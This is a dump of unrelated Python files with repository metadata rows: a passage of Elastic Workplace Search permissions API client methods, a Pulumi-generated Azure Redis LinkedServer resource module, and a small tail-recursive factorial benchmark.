    :arg http_auth: Access token or HTTP basic auth username
        and password to send with the request
    :arg request_timeout: Timeout in seconds
    :arg ignore_status: HTTP status codes to not raise an error
    :raises elastic_enterprise_search.BadRequestError:
    :raises elastic_enterprise_search.UnauthorizedError:
    :raises elastic_enterprise_search.NotFoundError:
    """
    # Both values become URL path segments, so neither may be empty.
    if content_source_id in SKIP_IN_PATH or user in SKIP_IN_PATH:
        raise ValueError("Empty value passed for a required argument")
    query = QueryParams(params)
    path = to_path(
        "api", "ws", "v1", "sources", content_source_id, "external_identities", user
    )
    return self.perform_request(
        "PUT",
        path,
        body=body,
        params=query,
        headers=headers,
        http_auth=http_auth,
        request_timeout=request_timeout,
        ignore_status=ignore_status,
    )
def list_permissions(
    self,
    content_source_id,
    current_page=None,
    page_size=None,
    params=None,
    headers=None,
    http_auth=DEFAULT,
    request_timeout=DEFAULT,
    ignore_status=(),
):
    """
    Lists all permissions for all users

    `<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-document-permissions-api.html#list>`_

    :arg content_source_id: Unique ID for a Custom API source, provided upon
        creation of a Custom API Source
    :arg current_page: Which page of results to request
    :arg page_size: The number of results to return in a page
    :arg params: Additional query params to send with the request
    :arg headers: Additional headers to send with the request
    :arg http_auth: Access token or HTTP basic auth username
        and password to send with the request
    :arg request_timeout: Timeout in seconds
    :arg ignore_status: HTTP status codes to not raise an error
    :raises elastic_enterprise_search.BadRequestError:
    :raises elastic_enterprise_search.UnauthorizedError:
    :raises elastic_enterprise_search.PaymentRequiredError:
    :raises elastic_enterprise_search.NotFoundError:
    """
    # The source ID becomes a URL path segment, so it may not be empty.
    if content_source_id in SKIP_IN_PATH:
        raise ValueError("Empty value passed for a required argument")
    query = QueryParams(params)
    # Pagination values are optional; only forward the ones supplied.
    for key, value in (("page[current]", current_page), ("page[size]", page_size)):
        if value is not None:
            query.add(key, value)
    path = to_path(
        "api", "ws", "v1", "sources", content_source_id, "permissions"
    )
    return self.perform_request(
        "GET",
        path,
        params=query,
        headers=headers,
        http_auth=http_auth,
        request_timeout=request_timeout,
        ignore_status=ignore_status,
    )
def remove_user_permissions(
    self,
    content_source_id,
    user,
    body,
    params=None,
    headers=None,
    http_auth=DEFAULT,
    request_timeout=DEFAULT,
    ignore_status=(),
):
    """
    Removes one or more permissions from an existing set of permissions

    `<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-document-permissions-api.html#remove-one>`_

    :arg content_source_id: Unique ID for a Custom API source, provided upon
        creation of a Custom API Source
    :arg user: The username in context
    :arg body: HTTP request body
    :arg params: Additional query params to send with the request
    :arg headers: Additional headers to send with the request
    :arg http_auth: Access token or HTTP basic auth username
        and password to send with the request
    :arg request_timeout: Timeout in seconds
    :arg ignore_status: HTTP status codes to not raise an error
    :raises elastic_enterprise_search.BadRequestError:
    :raises elastic_enterprise_search.UnauthorizedError:
    :raises elastic_enterprise_search.PaymentRequiredError:
    :raises elastic_enterprise_search.NotFoundError:
    """
    # Both values become URL path segments, so neither may be empty.
    if content_source_id in SKIP_IN_PATH or user in SKIP_IN_PATH:
        raise ValueError("Empty value passed for a required argument")
    query = QueryParams(params)
    path = to_path(
        "api", "ws", "v1", "sources", content_source_id, "permissions", user, "remove"
    )
    return self.perform_request(
        "POST",
        path,
        body=body,
        params=query,
        headers=headers,
        http_auth=http_auth,
        request_timeout=request_timeout,
        ignore_status=ignore_status,
    )
def search(
    self,
    body,
    params=None,
    headers=None,
    http_auth=DEFAULT,
    request_timeout=DEFAULT,
    ignore_status=(),
):
    """
    Search across available sources with various query tuning options

    `<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-search-api.html>`_

    :arg body: HTTP request body
    :arg params: Additional query params to send with the request
    :arg headers: Additional headers to send with the request
    :arg http_auth: Access token or HTTP basic auth username
        and password to send with the request
    :arg request_timeout: Timeout in seconds
    :arg ignore_status: HTTP status codes to not raise an error
    :raises elastic_enterprise_search.BadRequestError:
    :raises elastic_enterprise_search.UnauthorizedError:
    """
    # Fixed endpoint: no user-supplied path segments to validate here.
    endpoint = "/api/ws/v1/search"
    query = QueryParams(params)
    return self.perform_request(
        "POST",
        endpoint,
        body=body,
        params=query,
        headers=headers,
        http_auth=http_auth,
        request_timeout=request_timeout,
        ignore_status=ignore_status,
    )
def add_user_permissions(
    self,
    content_source_id,
    user,
    body,
    params=None,
    headers=None,
    http_auth=DEFAULT,
    request_timeout=DEFAULT,
    ignore_status=(),
):
    """
    Adds one or more new permissions atop existing permissions

    `<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-document-permissions-api.html#add-one>`_

    :arg content_source_id: Unique ID for a Custom API source, provided upon
        creation of a Custom API Source
    :arg user: The username in context
    :arg body: HTTP request body
    :arg params: Additional query params to send with the request
    :arg headers: Additional headers to send with the request
    :arg http_auth: Access token or HTTP basic auth username
        and password to send with the request
    :arg request_timeout: Timeout in seconds
    :arg ignore_status: HTTP status codes to not raise an error
    :raises elastic_enterprise_search.BadRequestError:
    :raises elastic_enterprise_search.UnauthorizedError:
    :raises elastic_enterprise_search.PaymentRequiredError:
    :raises elastic_enterprise_search.NotFoundError:
    """
    # Both values become URL path segments, so neither may be empty.
    if content_source_id in SKIP_IN_PATH or user in SKIP_IN_PATH:
        raise ValueError("Empty value passed for a required argument")
    query = QueryParams(params)
    path = to_path(
        "api", "ws", "v1", "sources", content_source_id, "permissions", user, "add"
    )
    return self.perform_request(
        "POST",
        path,
        body=body,
        params=query,
        headers=headers,
        http_auth=http_auth,
        request_timeout=request_timeout,
        ignore_status=ignore_status,
    )
def get_user_permissions(
    self,
    content_source_id,
    user,
    params=None,
    headers=None,
    http_auth=DEFAULT,
    request_timeout=DEFAULT,
    ignore_status=(),
):
    """
    Lists all permissions for one user

    `<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-document-permissions-api.html#list-one>`_

    :arg content_source_id: Unique ID for a Custom API source, provided upon
        creation of a Custom API Source
    :arg user: The username in context
    :arg params: Additional query params to send with the request
    :arg headers: Additional headers to send with the request
    :arg http_auth: Access token or HTTP basic auth username
        and password to send with the request
    :arg request_timeout: Timeout in seconds
    :arg ignore_status: HTTP status codes to not raise an error
    :raises elastic_enterprise_search.UnauthorizedError:
    :raises elastic_enterprise_search.PaymentRequiredError:
    :raises elastic_enterprise_search.NotFoundError:
    """
    # Both values become URL path segments, so neither may be empty.
    if content_source_id in SKIP_IN_PATH or user in SKIP_IN_PATH:
        raise ValueError("Empty value passed for a required argument")
    query = QueryParams(params)
    path = to_path(
        "api", "ws", "v1", "sources", content_source_id, "permissions", user
    )
    return self.perform_request(
        "GET",
        path,
        params=query,
        headers=headers,
        http_auth=http_auth,
        request_timeout=request_timeout,
        ignore_status=ignore_status,
    )
def put_user_permissions(
    self,
    content_source_id,
    user,
    body,
    params=None,
    headers=None,
    http_auth=DEFAULT,
    request_timeout=DEFAULT,
    ignore_status=(),
):
    """
    Creates a new set of permissions or over-writes all existing permissions

    `<https://www.elastic.co/guide/en/workplace-search/master/workplace-search-document-permissions-api.html#add-all>`_

    :arg content_source_id: Unique ID for a Custom API source, provided upon
        creation of a Custom API Source
    :arg user: The username in context
    :arg body: HTTP request body
    :arg params: Additional query params to send with the request
    :arg headers: Additional headers to send with the request
    :arg http_auth: Access token or HTTP basic auth username
        and password to send with the request
    :arg request_timeout: Timeout in seconds
    :arg ignore_status: HTTP status codes to not raise an error
    :raises elastic_enterprise_search.BadRequestError:
    :raises elastic_enterprise_search.UnauthorizedError:
    :raises elastic_enterprise_search.PaymentRequiredError:
    :raises elastic_enterprise_search.NotFoundError:
    """
    # Both values become URL path segments, so neither may be empty.
    if content_source_id in SKIP_IN_PATH or user in SKIP_IN_PATH:
        raise ValueError("Empty value passed for a required argument")
    query = QueryParams(params)
    path = to_path(
        "api", "ws", "v1", "sources", content_source_id, "permissions", user
    )
    return self.perform_request(
        "PUT",
        path,
        body=body,
        params=query,
        headers=headers,
        http_auth=http_auth,
        request_timeout=request_timeout,
        ignore_status=ignore_status,
    )
| 36.60509
| 140
| 0.584428
| 4,155
| 38,838
| 5.298195
| 0.05006
| 0.050195
| 0.046334
| 0.037204
| 0.926002
| 0.91946
| 0.918143
| 0.916735
| 0.914963
| 0.914963
| 0
| 0.001111
| 0.351074
| 38,838
| 1,060
| 141
| 36.639623
| 0.872356
| 0.436325
| 0
| 0.904173
| 0
| 0
| 0.076864
| 0.00143
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032458
| false
| 0.026275
| 0.004637
| 0
| 0.071097
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
48631eadbb959dda7f40176743cbf3a8115f2d4f
| 22,431
|
py
|
Python
|
sdk/python/pulumi_azure/redis/linked_server.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/redis/linked_server.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/redis/linked_server.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['LinkedServerArgs', 'LinkedServer']
@pulumi.input_type
class LinkedServerArgs:
    # NOTE: machine-generated by the Pulumi Terraform Bridge (tfgen).
    # The @pulumi.input_type decorator introspects __init__ and the
    # property pairs below, so their names and shapes must stay in sync
    # with the provider schema — do not restructure by hand.
    def __init__(__self__, *,
                 linked_redis_cache_id: pulumi.Input[str],
                 linked_redis_cache_location: pulumi.Input[str],
                 resource_group_name: pulumi.Input[str],
                 server_role: pulumi.Input[str],
                 target_redis_cache_name: pulumi.Input[str]):
        """
        The set of arguments for constructing a LinkedServer resource.

        :param pulumi.Input[str] linked_redis_cache_id: The ID of the linked Redis cache. Changing this forces a new Redis to be created.
        :param pulumi.Input[str] linked_redis_cache_location: The location of the linked Redis cache. Changing this forces a new Redis to be created.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Redis caches exists. Changing this forces a new Redis to be created.
        :param pulumi.Input[str] server_role: The role of the linked Redis cache (eg "Secondary"). Changing this forces a new Redis to be created.
        :param pulumi.Input[str] target_redis_cache_name: The name of Redis cache to link with. Changing this forces a new Redis to be created. (eg The primary role)
        """
        # All five arguments are required inputs; store them via pulumi.set
        # so the input-type machinery tracks them.
        pulumi.set(__self__, "linked_redis_cache_id", linked_redis_cache_id)
        pulumi.set(__self__, "linked_redis_cache_location", linked_redis_cache_location)
        pulumi.set(__self__, "resource_group_name", resource_group_name)
        pulumi.set(__self__, "server_role", server_role)
        pulumi.set(__self__, "target_redis_cache_name", target_redis_cache_name)

    @property
    @pulumi.getter(name="linkedRedisCacheId")
    def linked_redis_cache_id(self) -> pulumi.Input[str]:
        """
        The ID of the linked Redis cache. Changing this forces a new Redis to be created.
        """
        return pulumi.get(self, "linked_redis_cache_id")

    @linked_redis_cache_id.setter
    def linked_redis_cache_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "linked_redis_cache_id", value)

    @property
    @pulumi.getter(name="linkedRedisCacheLocation")
    def linked_redis_cache_location(self) -> pulumi.Input[str]:
        """
        The location of the linked Redis cache. Changing this forces a new Redis to be created.
        """
        return pulumi.get(self, "linked_redis_cache_location")

    @linked_redis_cache_location.setter
    def linked_redis_cache_location(self, value: pulumi.Input[str]):
        pulumi.set(self, "linked_redis_cache_location", value)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Input[str]:
        """
        The name of the Resource Group where the Redis caches exists. Changing this forces a new Redis to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter(name="serverRole")
    def server_role(self) -> pulumi.Input[str]:
        """
        The role of the linked Redis cache (eg "Secondary"). Changing this forces a new Redis to be created.
        """
        return pulumi.get(self, "server_role")

    @server_role.setter
    def server_role(self, value: pulumi.Input[str]):
        pulumi.set(self, "server_role", value)

    @property
    @pulumi.getter(name="targetRedisCacheName")
    def target_redis_cache_name(self) -> pulumi.Input[str]:
        """
        The name of Redis cache to link with. Changing this forces a new Redis to be created. (eg The primary role)
        """
        return pulumi.get(self, "target_redis_cache_name")

    @target_redis_cache_name.setter
    def target_redis_cache_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "target_redis_cache_name", value)
@pulumi.input_type
class _LinkedServerState:
    # NOTE: machine-generated by the Pulumi Terraform Bridge (tfgen).
    # Unlike LinkedServerArgs, every field here is Optional because this
    # type carries *lookup/filter* state (see LinkedServer.get), where any
    # subset of properties may be supplied.
    def __init__(__self__, *,
                 linked_redis_cache_id: Optional[pulumi.Input[str]] = None,
                 linked_redis_cache_location: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 server_role: Optional[pulumi.Input[str]] = None,
                 target_redis_cache_name: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering LinkedServer resources.

        :param pulumi.Input[str] linked_redis_cache_id: The ID of the linked Redis cache. Changing this forces a new Redis to be created.
        :param pulumi.Input[str] linked_redis_cache_location: The location of the linked Redis cache. Changing this forces a new Redis to be created.
        :param pulumi.Input[str] name: The name of the linked server.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Redis caches exists. Changing this forces a new Redis to be created.
        :param pulumi.Input[str] server_role: The role of the linked Redis cache (eg "Secondary"). Changing this forces a new Redis to be created.
        :param pulumi.Input[str] target_redis_cache_name: The name of Redis cache to link with. Changing this forces a new Redis to be created. (eg The primary role)
        """
        # Only set the fields that were actually provided, so absent ones
        # stay unset rather than being recorded as None.
        if linked_redis_cache_id is not None:
            pulumi.set(__self__, "linked_redis_cache_id", linked_redis_cache_id)
        if linked_redis_cache_location is not None:
            pulumi.set(__self__, "linked_redis_cache_location", linked_redis_cache_location)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if resource_group_name is not None:
            pulumi.set(__self__, "resource_group_name", resource_group_name)
        if server_role is not None:
            pulumi.set(__self__, "server_role", server_role)
        if target_redis_cache_name is not None:
            pulumi.set(__self__, "target_redis_cache_name", target_redis_cache_name)

    @property
    @pulumi.getter(name="linkedRedisCacheId")
    def linked_redis_cache_id(self) -> Optional[pulumi.Input[str]]:
        """
        The ID of the linked Redis cache. Changing this forces a new Redis to be created.
        """
        return pulumi.get(self, "linked_redis_cache_id")

    @linked_redis_cache_id.setter
    def linked_redis_cache_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "linked_redis_cache_id", value)

    @property
    @pulumi.getter(name="linkedRedisCacheLocation")
    def linked_redis_cache_location(self) -> Optional[pulumi.Input[str]]:
        """
        The location of the linked Redis cache. Changing this forces a new Redis to be created.
        """
        return pulumi.get(self, "linked_redis_cache_location")

    @linked_redis_cache_location.setter
    def linked_redis_cache_location(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "linked_redis_cache_location", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the linked server.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the Resource Group where the Redis caches exists. Changing this forces a new Redis to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter(name="serverRole")
    def server_role(self) -> Optional[pulumi.Input[str]]:
        """
        The role of the linked Redis cache (eg "Secondary"). Changing this forces a new Redis to be created.
        """
        return pulumi.get(self, "server_role")

    @server_role.setter
    def server_role(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "server_role", value)

    @property
    @pulumi.getter(name="targetRedisCacheName")
    def target_redis_cache_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of Redis cache to link with. Changing this forces a new Redis to be created. (eg The primary role)
        """
        return pulumi.get(self, "target_redis_cache_name")

    @target_redis_cache_name.setter
    def target_redis_cache_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "target_redis_cache_name", value)
class LinkedServer(pulumi.CustomResource):
    # NOTE: machine-generated by the Pulumi Terraform Bridge (tfgen).
    # The two @overload __init__ signatures exist only for type checkers;
    # the real constructor dispatches to _internal_init below.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 linked_redis_cache_id: Optional[pulumi.Input[str]] = None,
                 linked_redis_cache_location: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 server_role: Optional[pulumi.Input[str]] = None,
                 target_redis_cache_name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Manages a Redis Linked Server (ie Geo Location)

        ## Example Usage

        ```python
        import pulumi
        import pulumi_azure as azure

        example_primary_resource_group = azure.core.ResourceGroup("example-primaryResourceGroup", location="East US")
        example_primary_cache = azure.redis.Cache("example-primaryCache",
            location=example_primary_resource_group.location,
            resource_group_name=example_primary_resource_group.name,
            capacity=1,
            family="P",
            sku_name="Premium",
            enable_non_ssl_port=False,
            redis_configuration=azure.redis.CacheRedisConfigurationArgs(
                maxmemory_reserved=2,
                maxmemory_delta=2,
                maxmemory_policy="allkeys-lru",
            ))
        example_secondary_resource_group = azure.core.ResourceGroup("example-secondaryResourceGroup", location="West US")
        example_secondary_cache = azure.redis.Cache("example-secondaryCache",
            location=example_secondary_resource_group.location,
            resource_group_name=example_secondary_resource_group.name,
            capacity=1,
            family="P",
            sku_name="Premium",
            enable_non_ssl_port=False,
            redis_configuration=azure.redis.CacheRedisConfigurationArgs(
                maxmemory_reserved=2,
                maxmemory_delta=2,
                maxmemory_policy="allkeys-lru",
            ))
        example_link = azure.redis.LinkedServer("example-link",
            target_redis_cache_name=example_primary_cache.name,
            resource_group_name=example_primary_cache.resource_group_name,
            linked_redis_cache_id=example_secondary_cache.id,
            linked_redis_cache_location=example_secondary_cache.location,
            server_role="Secondary")
        ```

        ## Import

        Redis can be imported using the `resource id`, e.g.

        ```sh
         $ pulumi import azure:redis/linkedServer:LinkedServer example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Cache/Redis/cache1/linkedServers/cache2
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] linked_redis_cache_id: The ID of the linked Redis cache. Changing this forces a new Redis to be created.
        :param pulumi.Input[str] linked_redis_cache_location: The location of the linked Redis cache. Changing this forces a new Redis to be created.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Redis caches exists. Changing this forces a new Redis to be created.
        :param pulumi.Input[str] server_role: The role of the linked Redis cache (eg "Secondary"). Changing this forces a new Redis to be created.
        :param pulumi.Input[str] target_redis_cache_name: The name of Redis cache to link with. Changing this forces a new Redis to be created. (eg The primary role)
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: LinkedServerArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages a Redis Linked Server (ie Geo Location)

        ## Example Usage

        ```python
        import pulumi
        import pulumi_azure as azure

        example_primary_resource_group = azure.core.ResourceGroup("example-primaryResourceGroup", location="East US")
        example_primary_cache = azure.redis.Cache("example-primaryCache",
            location=example_primary_resource_group.location,
            resource_group_name=example_primary_resource_group.name,
            capacity=1,
            family="P",
            sku_name="Premium",
            enable_non_ssl_port=False,
            redis_configuration=azure.redis.CacheRedisConfigurationArgs(
                maxmemory_reserved=2,
                maxmemory_delta=2,
                maxmemory_policy="allkeys-lru",
            ))
        example_secondary_resource_group = azure.core.ResourceGroup("example-secondaryResourceGroup", location="West US")
        example_secondary_cache = azure.redis.Cache("example-secondaryCache",
            location=example_secondary_resource_group.location,
            resource_group_name=example_secondary_resource_group.name,
            capacity=1,
            family="P",
            sku_name="Premium",
            enable_non_ssl_port=False,
            redis_configuration=azure.redis.CacheRedisConfigurationArgs(
                maxmemory_reserved=2,
                maxmemory_delta=2,
                maxmemory_policy="allkeys-lru",
            ))
        example_link = azure.redis.LinkedServer("example-link",
            target_redis_cache_name=example_primary_cache.name,
            resource_group_name=example_primary_cache.resource_group_name,
            linked_redis_cache_id=example_secondary_cache.id,
            linked_redis_cache_location=example_secondary_cache.location,
            server_role="Secondary")
        ```

        ## Import

        Redis can be imported using the `resource id`, e.g.

        ```sh
         $ pulumi import azure:redis/linkedServer:LinkedServer example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Cache/Redis/cache1/linkedServers/cache2
        ```

        :param str resource_name: The name of the resource.
        :param LinkedServerArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Runtime constructor: decide which overload the caller used
        # (an args-object or individual keyword arguments) and forward
        # everything to _internal_init.
        resource_args, opts = _utilities.get_resource_args_opts(LinkedServerArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       linked_redis_cache_id: Optional[pulumi.Input[str]] = None,
                       linked_redis_cache_location: Optional[pulumi.Input[str]] = None,
                       resource_group_name: Optional[pulumi.Input[str]] = None,
                       server_role: Optional[pulumi.Input[str]] = None,
                       target_redis_cache_name: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        # Normalize/validate the resource options first.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        # opts.id set means "adopt an existing resource"; in that case the
        # engine supplies __props__ and no per-field validation happens here.
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = LinkedServerArgs.__new__(LinkedServerArgs)
            # Each required input must be present unless the resource is
            # being rehydrated from a URN (opts.urn set).
            if linked_redis_cache_id is None and not opts.urn:
                raise TypeError("Missing required property 'linked_redis_cache_id'")
            __props__.__dict__["linked_redis_cache_id"] = linked_redis_cache_id
            if linked_redis_cache_location is None and not opts.urn:
                raise TypeError("Missing required property 'linked_redis_cache_location'")
            __props__.__dict__["linked_redis_cache_location"] = linked_redis_cache_location
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__.__dict__["resource_group_name"] = resource_group_name
            if server_role is None and not opts.urn:
                raise TypeError("Missing required property 'server_role'")
            __props__.__dict__["server_role"] = server_role
            if target_redis_cache_name is None and not opts.urn:
                raise TypeError("Missing required property 'target_redis_cache_name'")
            __props__.__dict__["target_redis_cache_name"] = target_redis_cache_name
            # Output-only property; the provider fills it in after creation.
            __props__.__dict__["name"] = None
        super(LinkedServer, __self__).__init__(
            'azure:redis/linkedServer:LinkedServer',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            linked_redis_cache_id: Optional[pulumi.Input[str]] = None,
            linked_redis_cache_location: Optional[pulumi.Input[str]] = None,
            name: Optional[pulumi.Input[str]] = None,
            resource_group_name: Optional[pulumi.Input[str]] = None,
            server_role: Optional[pulumi.Input[str]] = None,
            target_redis_cache_name: Optional[pulumi.Input[str]] = None) -> 'LinkedServer':
        """
        Get an existing LinkedServer resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] linked_redis_cache_id: The ID of the linked Redis cache. Changing this forces a new Redis to be created.
        :param pulumi.Input[str] linked_redis_cache_location: The location of the linked Redis cache. Changing this forces a new Redis to be created.
        :param pulumi.Input[str] name: The name of the linked server.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Redis caches exists. Changing this forces a new Redis to be created.
        :param pulumi.Input[str] server_role: The role of the linked Redis cache (eg "Secondary"). Changing this forces a new Redis to be created.
        :param pulumi.Input[str] target_redis_cache_name: The name of Redis cache to link with. Changing this forces a new Redis to be created. (eg The primary role)
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        # Build a state bag from the supplied filter properties and
        # re-construct the resource pointing at the existing provider ID.
        __props__ = _LinkedServerState.__new__(_LinkedServerState)

        __props__.__dict__["linked_redis_cache_id"] = linked_redis_cache_id
        __props__.__dict__["linked_redis_cache_location"] = linked_redis_cache_location
        __props__.__dict__["name"] = name
        __props__.__dict__["resource_group_name"] = resource_group_name
        __props__.__dict__["server_role"] = server_role
        __props__.__dict__["target_redis_cache_name"] = target_redis_cache_name
        return LinkedServer(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="linkedRedisCacheId")
    def linked_redis_cache_id(self) -> pulumi.Output[str]:
        """
        The ID of the linked Redis cache. Changing this forces a new Redis to be created.
        """
        return pulumi.get(self, "linked_redis_cache_id")

    @property
    @pulumi.getter(name="linkedRedisCacheLocation")
    def linked_redis_cache_location(self) -> pulumi.Output[str]:
        """
        The location of the linked Redis cache. Changing this forces a new Redis to be created.
        """
        return pulumi.get(self, "linked_redis_cache_location")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        The name of the linked server.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Output[str]:
        """
        The name of the Resource Group where the Redis caches exists. Changing this forces a new Redis to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @property
    @pulumi.getter(name="serverRole")
    def server_role(self) -> pulumi.Output[str]:
        """
        The role of the linked Redis cache (eg "Secondary"). Changing this forces a new Redis to be created.
        """
        return pulumi.get(self, "server_role")

    @property
    @pulumi.getter(name="targetRedisCacheName")
    def target_redis_cache_name(self) -> pulumi.Output[str]:
        """
        The name of Redis cache to link with. Changing this forces a new Redis to be created. (eg The primary role)
        """
        return pulumi.get(self, "target_redis_cache_name")
| 48.23871
| 204
| 0.674201
| 2,772
| 22,431
| 5.166667
| 0.071789
| 0.093562
| 0.099427
| 0.046432
| 0.887236
| 0.871736
| 0.856654
| 0.836894
| 0.832914
| 0.820067
| 0
| 0.004863
| 0.239178
| 22,431
| 464
| 205
| 48.342672
| 0.834349
| 0.40979
| 0
| 0.575893
| 1
| 0
| 0.141841
| 0.07164
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15625
| false
| 0.004464
| 0.022321
| 0
| 0.272321
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f8add949090b45174a43368df9ab63681599f53
| 185
|
py
|
Python
|
benchmarks/tail-factorial.py
|
c1m5j/pancake
|
f8c3c6045e147a0569d7cc0a11914c2e5306e662
|
[
"MIT"
] | 5
|
2021-10-09T12:54:10.000Z
|
2021-10-30T01:29:05.000Z
|
benchmarks/tail-factorial.py
|
c1m5j/pancake
|
f8c3c6045e147a0569d7cc0a11914c2e5306e662
|
[
"MIT"
] | 1
|
2021-10-31T08:54:15.000Z
|
2021-10-31T08:54:15.000Z
|
benchmarks/tail-factorial.py
|
c1m5j/pancake
|
f8c3c6045e147a0569d7cc0a11914c2e5306e662
|
[
"MIT"
] | 1
|
2021-10-18T06:20:42.000Z
|
2021-10-18T06:20:42.000Z
|
def factorial_accumulate(n, acc):
    """Tail-recursive core: return acc * n!, with acc as the running product."""
    if n != 0:
        return factorial_accumulate(n - 1, acc * n)
    return acc
def factorial(n):
    """Return n! by delegating to the tail-recursive accumulator helper."""
    return factorial_accumulate(n, 1)
# Benchmark driver: compute and print 20!.
print(factorial(20))
| 20.555556
| 45
| 0.697297
| 28
| 185
| 4.5
| 0.392857
| 0.452381
| 0.47619
| 0.412698
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033113
| 0.183784
| 185
| 8
| 46
| 23.125
| 0.801325
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.166667
| 0.666667
| 0.166667
| 1
| 0
